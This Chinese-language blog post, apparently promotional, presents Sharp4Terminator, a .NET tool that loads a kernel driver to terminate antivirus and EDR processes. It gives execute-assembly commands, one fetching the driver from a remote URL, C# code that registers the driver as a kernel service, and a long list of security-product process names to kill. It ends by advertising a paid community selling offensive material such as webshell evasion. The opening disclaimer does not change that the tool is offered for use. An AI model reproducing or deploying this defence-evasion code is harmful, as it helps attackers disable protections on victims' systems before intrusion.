01阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02基本介绍
Sharp4Terminator是一款基于.NET实现的利器,通过加载内核驱动程序来关闭反病毒软件或EDR进程。工具支持远程下载驱动和本地加载两种方式,通过驱动程序关闭常见的反病毒软件和EDR进程。
03使用方法
Sharp4Terminator使用内核驱动程序关闭反病毒软件和EDR(Endpoint Detection and Response)进程。
3.1 远程下载驱动
通过指定远程URL,Sharp4Terminator将驱动程序下载到C:\Windows\Temp目录,并从该位置加载。具体用法如下所示。
execute-assembly Sharp4Terminator.exe --url "http://remoteurl.com:80/Terminator.sys"
3.2 本地加载驱动
通过指定本地磁盘路径,Sharp4Terminator直接加载驱动程序。具体用法如下。
execute-assembly Sharp4Terminator.exe --disk "C:\path\to\driver\Terminator.sys"
04核心代码
Sharp4Terminator过调用Windows服务管理API,打开服务控制管理器,创建一个新的服务并加载指定路径的驱动程序。具体代码如下所示。
private static bool LoadDriver(string driverPath)
{
IntPtr hSCM = NativeMethods.OpenSCManager(null, null, NativeMethods.ServiceManagerAccess.SC_MANAGER_ALL_ACCESS);
IntPtr hService = NativeMethods.OpenService(hSCM, "Mert", NativeMethods.ServiceAccess.SERVICE_ALL_ACCESS);
hService = NativeMethods.CreateService(
hSCM, "Mert", "MErt", NativeMethods.ServiceAccess.SERVICE_ALL_ACCESS,
NativeMethods.ServiceType.SERVICE_KERNEL_DRIVER,
NativeMethods.ServiceStartType.SERVICE_DEMAND_START,
NativeMethods.ServiceErrorControl.SERVICE_ERROR_IGNORE,
driverPath, null, IntPtr.Zero, null, null, null
);
NativeMethods.CloseServiceHandle(hService);
NativeMethods.CloseServiceHandle(hSCM);
return true;
}
Sharp4Terminator的另一个关键部分是针对EDR和反病毒软件进程的列表。工具通过检测并关闭这些进程来实现其目标。具体代码如下所示。
private static readonly string[] edrList = new string[]
{
"activeconsole", "anti malware", "anti-malware", "antimalware", "anti virus", "anti-virus", "antivirus",
"appsense", "authtap", "avast", "avecto", "canary", "carbonblack", "carbon black", "cb.exe",
"ciscoamp", "cisco amp", "countercept", "countertack", "cramtray", "crssvc", "crowdstrike",
"csagent", "csfalcon", "csshell", "cybereason", "cyclorama", "cylance", "cyoptics", "cyupdate",
"cyvera", "cyserver", "cytray", "darktrace", "defendpoint", "defender", "eectrl", "elastic",
"endgame", "f-secure", "forcepoint", "fireeye", "groundling", "GRRservic", "inspector",
"ivanti", "kaspersky", "lacuna", "logrhythm", "malware", "mandiant", "mcafee", "morphisec",
"msascuil", "msmpeng", "nissrv", "omni", "omniagent", "osquery", "palo alto networks",
"pgeposervice", "pgsystemtray", "privilegeguard", "procwall", "protectorservic", "qradar",
"redcloak", "secureworks", "securityhealthservice", "semlaunchsv", "sentinel", "sepliveupdat",
"sisidsservice", "sisipsservice", "sisipsutil", "smc.exe", "smcgui", "snac64", "sophos",
"splunk", "srtsp", "symantec", "symcorpu", "symefasi", "sysinternal", "sysmon", "tanium",
"tda.exe", "tdawork", "tpython", "vectra", "wincollect", "windowssensor", "wireshark",
"threat", "xagt.exe", "xagtnotif.exe", "mssense"
};
上述列表包含了许多常见的EDR和反病毒软件进程名称。工具通过检测并尝试关闭这些进程,达到绕过防御系统的目的。工具已经打包在星球,感兴趣的朋友可以加入自取。
05.NET安全星球
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
